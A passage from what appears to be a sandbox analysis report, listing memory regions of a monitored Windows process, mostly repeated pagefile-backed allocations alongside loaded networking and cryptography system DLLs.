0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1781 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1782 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1783 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1784 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1785 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1786 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1787 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1788 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1789 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1790 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1791 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1792 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1793 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1794 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1795 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1796 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1797 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1798 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1799 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1800 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1801 start_va = 0x6fa0000 end_va = 0x6fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fa0000" filename = "" Region: id = 1802 start_va = 0x6fe0000 end_va = 0x701ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fe0000" filename = "" Region: id = 1803 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1804 start_va = 0x45b0000 end_va = 0x45b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1805 start_va = 0x45b0000 end_va = 0x45bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1806 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1807 start_va = 0x45b0000 end_va = 0x45b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1808 start_va = 0x712a0000 end_va = 0x712b1fff monitored = 0 entry_point = 0x712a4510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1809 start_va = 0x71270000 end_va = 0x7129efff monitored = 0 entry_point = 0x7127bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1810 start_va = 0x45c0000 end_va = 0x45c4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 1811 start_va = 0x45c0000 end_va = 0x45c4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 1812 start_va = 0x45c0000 end_va = 0x45cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 1813 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1814 start_va = 0x711d0000 end_va = 0x7126afff monitored = 0 entry_point = 0x7120f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1815 start_va = 0x7020000 end_va = 0x705ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007020000" filename = "" Region: id = 1816 start_va = 0x7060000 end_va = 0x709ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007060000" filename = "" Region: id = 1817 start_va = 0x71180000 end_va = 0x711cefff monitored = 0 entry_point = 0x7118d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1818 start_va = 0x71170000 end_va = 0x71177fff monitored = 0 entry_point = 0x71171fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1819 start_va = 0x75f10000 end_va = 0x75f16fff monitored = 0 entry_point = 0x75f11e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1820 start_va = 0x70a0000 end_va = 0x70dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000070a0000" filename = "" Region: id = 1821 start_va = 0x70e0000 end_va = 0x711ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000070e0000" filename = "" Region: id = 1822 start_va = 0x708d0000 end_va = 0x70953fff monitored = 0 entry_point = 0x708f6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1823 start_va = 0x45c0000 end_va = 0x45c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 1824 start_va = 0x6f8b0000 end_va = 0x6f8b7fff monitored = 0 entry_point = 0x6f8b1920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1825 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1826 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1827 start_va = 0x4840000 end_va = 0x484dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1828 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1829 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1830 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1831 start_va = 0x4840000 end_va = 0x484dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1832 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1833 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1834 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1835 start_va = 0x4840000 end_va = 0x484dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1836 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1837 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1838 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1839 start_va = 0x4840000 end_va = 0x484dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1840 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1841 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1842 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1843 start_va = 0x4840000 end_va = 0x484dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1844 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1845 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1846 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1847 start_va = 0x4840000 end_va = 0x484dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1848 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1849 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1850 start_va = 0x4840000 end_va = 0x4844fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1851 start_va = 0x7120000 end_va = 0x715ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007120000" filename = "" Region: id = 1852 start_va = 0x7160000 end_va = 0x719ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007160000" filename = "" Region: id = 1853 start_va = 0x4840000 end_va = 0x484dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1854 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1855 start_va = 0x6f8c0000 end_va = 0x6f906fff monitored = 0 entry_point = 0x6f8d58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1856 start_va = 0x4840000 end_va = 0x4842fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 1857 start_va = 0x6000000 end_va = 0x6007fff monitored = 0 entry_point = 0x60019c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1858 start_va = 0x6010000 end_va = 0x6010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1859 start_va = 0x6000000 end_va = 0x6007fff monitored = 0 entry_point = 0x60019c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1860 start_va = 0x6010000 end_va = 0x6010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1861 start_va = 0x6000000 end_va = 0x6007fff monitored = 0 entry_point = 0x60019c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1862 start_va = 0x6010000 end_va = 0x6010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1863 start_va = 0x6000000 end_va = 0x6007fff monitored = 0 entry_point = 0x60019c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1864 start_va = 0x6010000 end_va = 0x6010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1865 start_va = 0x6000000 end_va = 0x6004fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006000000" filename = "" Region: id = 1866 start_va = 0x6000000 end_va = 0x6004fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006000000" filename = "" Region: id = 1867 start_va = 0x6000000 end_va = 0x6004fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006000000" filename = "" Region: id = 1868 start_va = 0x6f840000 end_va = 0x6f8a3fff monitored = 0 entry_point = 0x6f85afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1869 start_va = 0x6000000 end_va = 0x600dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006000000" filename = "" Region: id = 1870 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1871 start_va = 0x6000000 end_va = 0x6001fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 1872 start_va = 0x6f830000 end_va = 0x6f83ffff monitored = 0 entry_point = 0x6f834600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1873 start_va = 0x6f810000 end_va = 0x6f82ffff monitored = 0 entry_point = 0x6f81d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1874 start_va = 0x6f7e0000 end_va = 0x6f80bfff monitored = 0 entry_point = 0x6f7fbb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1875 start_va = 0x6010000 end_va = 0x6010fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006010000" filename = "" Region: id = 1876 start_va = 0x71a0000 end_va = 0x71dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071a0000" filename = "" Region: id = 1877 start_va = 0x71e0000 end_va = 0x721ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071e0000" filename = "" Region: id = 1878 start_va = 0x6f7b0000 end_va = 0x6f7b7fff monitored = 0 entry_point = 0x6f7b1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1879 start_va = 0x75ca0000 end_va = 0x75ce1fff monitored = 0 entry_point = 0x75cb6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1880 start_va = 0x72af0000 end_va = 0x72b02fff monitored = 0 entry_point = 0x72af9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1881 start_va = 0x70100000 end_va = 0x7012efff monitored = 0 entry_point = 0x701195e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1882 start_va = 0x7220000 end_va = 0x725ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007220000" filename = "" Region: id = 1883 start_va = 0x7260000 end_va = 0x729ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007260000" filename = "" Region: id = 1884 start_va = 0x6000000 end_va = 0x6004fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006000000" filename = "" Region: id = 1885 start_va = 0x6000000 end_va = 0x6004fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006000000" filename = "" Region: id = 1886 start_va = 0x6000000 end_va = 0x600dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006000000" filename = "" Region: id = 1887 start_va = 0x6f7c0000 end_va = 0x6f7d9fff monitored = 0 entry_point = 0x6f7cfa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1888 start_va = 0x6000000 end_va = 0x6009fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1889 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1890 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1891 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1892 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1893 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1894 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1895 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1896 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1897 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1898 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1899 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1900 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1901 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1902 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1903 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1904 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1905 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1906 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1907 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1908 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1909 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1910 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1911 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1912 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1913 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1914 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1915 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1916 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1917 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1918 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1919 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1920 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1921 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1922 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1923 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1924 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1925 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1926 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1927 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1928 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1929 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1930 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1931 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1932 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1933 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1934 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1935 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1936 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1937 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1938 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1939 start_va = 0x72a0000 end_va = 0x72dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 1940 start_va = 0x72e0000 end_va = 0x731ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072e0000" filename = "" Region: id = 1941 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1942 start_va = 0x6010000 end_va = 0x601dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1943 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1944 start_va = 0x6010000 end_va = 0x6014fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1945 start_va = 0x6010000 end_va = 0x6014fff monitored = 